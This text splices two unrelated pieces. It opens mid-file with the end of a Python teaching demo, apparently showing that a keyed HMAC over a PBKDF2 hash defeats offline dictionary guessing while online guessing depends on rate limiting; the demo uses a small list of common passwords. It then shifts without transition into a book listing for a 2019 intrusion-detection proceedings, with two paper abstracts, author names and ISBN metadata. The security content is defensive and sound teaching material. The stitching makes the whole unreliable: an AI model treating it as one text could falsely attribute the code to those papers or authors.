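        return hmac.new(self._key, digest, hashlib.sha256).digest()


def slow_hash(password, salt, iterations=2_000):
    # PBKDF2 stands in for scrypt/bcrypt; the iteration count is kept low for the demo.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def enroll(service, password):
    """What the site stores: salt and HMAC_key(slow_hash(password, salt))."""
    salt = os.urandom(16)
    return salt, service.harden(slow_hash(password, salt))


def verify(service, record, password):
    salt, stored = record
    return hmac.compare_digest(stored, service.harden(slow_hash(password, salt)))


def crack_offline(record, wordlist, iterations=2_000):
    """All an attacker can do with the leaked table: recompute the slow hash and
    compare. The stored value is keyed, so no guess can ever match."""
    salt, stored = record
    for guess in wordlist:
        if hmac.compare_digest(slow_hash(guess, salt, iterations), stored):
            return guess
    return None


def crack_online(service, record, wordlist):
    """Every guess now costs one oracle call, which the service can count and throttle."""
    for guess in wordlist:
        if verify(service, record, guess):
            return guess
    return None


WORDLIST = ["123456", "password", "qwerty", "letmein", "Welcome1"]  # constructed
```

The offline search fails for every password, however weak; the online search succeeds only while the service keeps answering, which is where the rate limit, logging and alerting of a real deployment do their work.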
Role Inference + Anomaly Detection = Situational Awareness in BACnet Networks
Abstract
In smart buildings, cyber-physical components (e.g., controllers, sensors, and actuators) communicate with each other using network protocols such as BACnet. Many of these devices are now connected to the Internet, enabling attackers to exploit vulnerabilities in protocols and devices to attack buildings. Situational awareness and intrusion detection are thus critical to provide operators with a clear and dynamic picture of their network, and to allow them to react to threats and attacks. Because smart buildings are relatively dynamic and heterogeneous environments, situational awareness further needs to rapidly adapt to the appearance of new devices, and to provide enough context and information to understand a device's behavior. In this paper, we propose a novel approach to situational awareness that leverages a combination of learning and knowledge of possible device roles. Specifically, we introduce a role-based situational awareness and intrusion detection system to monitor BACnet building automation networks. The system discovers devices, classifies them according to functional roles and detects deviations from the assigned roles. To validate our approach, we use a simulated dataset generated from a BACnet testbed, as well as a real-world dataset coming from the building network of a Dutch university.
Davide Fauri, Michail Kapsalakis, Daniel Ricardo dos Santos, Elisa Costante, Jerry den Hartog, Sandro Etalle
BinTrimmer: Towards Static Binary Debloating Through Abstract Interpretation
Abstract
The increasing complexity of modern programs motivates software engineers to often rely on the support of third-party libraries. Although this practice allows application developers to achieve a compelling time-to-market, it often makes the final product bloated with conspicuous chunks of unused code. Other than making a program unnecessarily large, this dormant code could be leveraged by willful attackers to harm users. As a consequence, several techniques have been recently proposed to perform program debloating and remove (or secure) dead code from applications. However, state-of-the-art approaches are either based on unsound strategies, thus producing unreliable results, or impose overly strict assumptions on the program itself.
In this work, we propose a novel abstract domain, called Signedness-Agnostic Strided Interval, which we use as the cornerstone to design a novel and sound static technique, based on abstract interpretation, to reliably perform program debloating. Throughout the paper, we detail the specifics of our approach and show its effectiveness and usefulness by implementing it in a tool, called BinTrimmer, to perform static program debloating on binaries.
Our evaluation shows that BinTrimmer can remove up to 65.6% of a library’s code and that our domain is, on average, 98% more precise than the related work.
Nilo Redini, Ruoyu Wang, Aravind Machiry, Yan Shoshitaishvili, Giovanni Vigna, Christopher Kruegel
Backmatter
Metadata
Title
Detection of Intrusions and Malware, and Vulnerability Assessment
Edited by
Roberto Perdisci
Clémentine Maurice
Giorgio Giacinto
Dr. Magnus Almgren
Copyright year
2019
Electronic ISBN
978-3-030-22038-9
Print ISBN
978-3-030-22037-2
DOI
https://doi.org/10.1007/978-3-030-22038-9
